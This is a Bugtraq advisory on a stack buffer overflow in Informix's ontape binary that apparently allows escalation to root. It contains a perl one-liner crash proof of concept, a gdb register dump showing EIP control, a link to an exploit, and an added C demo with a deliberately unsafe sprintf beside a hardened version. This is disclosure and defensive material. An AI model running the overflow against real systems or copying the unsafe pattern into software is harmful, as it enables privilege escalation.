----------========== OPEN3S-2003-08-08-eng-informix-ontape ==========----------

From: pask@open3s.com
Date: Thu, 29 Jan 2004 10:19:58 +0100 (CET)
To: bugtraq@securityfocus.com

            ----------========== OPEN3S-2003-08-08-eng-informix-ontape ==========----------

     Title: Local Vulnerability at Informix IDSv9.40 via ontape binary
     Date: 08-08-2003
     Platform: Only tested on Linux, but the issue most likely applies to other platforms.
     Impact: Any user with DSA privileges over Informix could achieve root
               privileges through a stack buffer overflow in the ontape binary
     Author: Juan Manuel Pascual Escriba pask@open3s.com
     Status: Solved by IBM Corp.

    PROBLEM SUMMARY:

        A stack buffer overflow occurs when ontape reads the ONCONFIG
    environment variable: a value of 495 bytes is enough to overwrite the
    saved frame pointer and the return address, as the register dump below
    shows (ebp and eip both become 0x41414141).

    [informix@dimoni bin]$ export ONCONFIG=`perl -e 'print "A"x495'`
    [informix@dimoni bin]$ ./ontape
    WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
    Segmentation fault

    [pask@dimoniet bin]$ gdb ./ontape
    (gdb) r
    WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
    Segmentation fault

    (gdb) info reg
    eax 0xffffffff -1
    ecx 0x40083580 1074279808
    edx 0x46 70
    ebx 0x1 1
    esp 0xbfff74a0 0xbfff74a0
    ebp 0x41414141 0x41414141
    esi 0xbfff74cc -1073777460
    edi 0x0 0
    eip 0x41414141 0x41414141

    It is possible to achieve root privileges through this buffer overflow.
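    The crash above is consistent with an unbounded copy of the ONCONFIG value
    into a fixed-size stack buffer. The following is an added example, not code
    from the advisory or from IBM: it shows that pattern in miniature beside a
    bounded version that rejects over-long values instead of proceeding. The
    256-byte buffer size, the $INFORMIXDIR/etc/$ONCONFIG path layout, the
    /opt/informix default and all function names are assumptions for
    illustration; the real buffer size inside ontape is not published.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the on-stack path buffer (not ontape's real size). 495
 * bytes of ONCONFIG reach EBP/EIP in the advisory's trace, so the real
 * buffer is somewhat smaller than that. */
#define PATH_BUF 256

/* VULNERABLE pattern (illustrative): the environment value is formatted
 * into a fixed stack buffer with no length check. A long ONCONFIG runs
 * past `path`, over the saved frame pointer and the return address, which
 * is the ebp/eip = 0x41414141 state shown above. Returns the length
 * sprintf wrote. */
static int build_config_path_unsafe(const char *informixdir, const char *onconfig)
{
    char path[PATH_BUF];
    int n = sprintf(path, "%s/etc/%s", informixdir, onconfig);  /* unbounded */
    return n;
}

/* HARDENED form: bounded formatting plus an explicit check. snprintf returns
 * the length the full string needs; n >= outlen means it did not fit, and we
 * refuse rather than continue with a truncated path. Returns the path length
 * on success, -1 if rejected. */
static int build_config_path_safe(char *out, size_t outlen,
                                  const char *informixdir, const char *onconfig)
{
    int n = snprintf(out, outlen, "%s/etc/%s", informixdir, onconfig);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen > 0)
            out[0] = '\0';
        return -1;
    }
    return n;
}

/* Would the unbounded builder overrun PATH_BUF for an ONCONFIG of `len`
 * bytes? Computed arithmetically so this check never performs the overrun. */
static int unsafe_would_overflow(const char *informixdir, size_t len)
{
    return strlen(informixdir) + strlen("/etc/") + len + 1 > PATH_BUF;
}

/* Feed the hardened builder an ONCONFIG of `len` 'A's, the same payload
 * shape as the perl one-liner in the PoC. Returns the builder's result. */
static int probe_safe_with_len(size_t len)
{
    static char name[1024];
    char path[PATH_BUF];
    if (len >= sizeof name)
        return -2;
    memset(name, 'A', len);
    name[len] = '\0';
    return build_config_path_safe(path, sizeof path, "/opt/informix", name);
}

/* Hardened builder on a sane value, for comparison with the unsafe one. */
static const char *safe_path_example(void)
{
    static char path[PATH_BUF];
    build_config_path_safe(path, sizeof path, "/opt/informix", "onconfig");
    return path;
}

int main(int argc, char **argv)
{
    /* Defaults stand in for a real Informix environment (assumption). */
    const char *dir  = getenv("INFORMIXDIR") ? getenv("INFORMIXDIR") : "/opt/informix";
    const char *name = getenv("ONCONFIG")    ? getenv("ONCONFIG")    : "onconfig";
    char path[PATH_BUF];

    printf("unsafe builder on a sane name: %d bytes\n",
           build_config_path_unsafe(dir, "onconfig"));

    if (build_config_path_safe(path, sizeof path, dir, name) < 0)
        printf("hardened builder: rejected ONCONFIG of %zu bytes\n", strlen(name));
    else
        printf("hardened builder: %s\n", path);

    /* Opt-in reproduction of the crash, e.g.
     *   ONCONFIG=$(perl -e 'print "A"x495') ./ontape_demo --crash
     * This is undefined behaviour: expect a segfault, or an abort from the
     * stack protector / FORTIFY_SOURCE on a hardened toolchain. */
    if (argc > 1 && strcmp(argv[1], "--crash") == 0 && unsafe_would_overflow(dir, strlen(name)))
        build_config_path_unsafe(dir, name);
    return 0;
}
```

    Build with `cc -o ontape_demo ontape_demo.c` and run it with a long
    ONCONFIG to see the bounded builder reject the value; only the explicit
    `--crash` flag exercises the unbounded copy with that value. The
    hardened form treats "did not fit" as an error rather than silently
    truncating, since a truncated path would still be wrong, just quietly.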

    IMPACT:
        Any user with exec permission over ontape could achieve root
    privileges. In my default installation only users with DSA privileges
    can exec this binary.

    SOLUTION:

            See more information about this vulnerability and its workaround at:
    http://www-1.ibm.com/support/docview.wss?uid=swg21153336

    STATUS

    Reported to the IBM security team on 11 August 2003.

    This vulnerability was managed in an efficient manner by Jonathan Leffler
    from IBM Informix Database Engineering Team.

    EXPLOIT
        http://www.open3s.com/exploits/OPEN3S-2003-08-08-eng-informix-ontape.c

    --------------------------------------------------
    This vulnerability was researched by:
    Juan Manuel Pascual Escriba pask@open3s.com
    Barcelona - Spain http://www.open3s.com

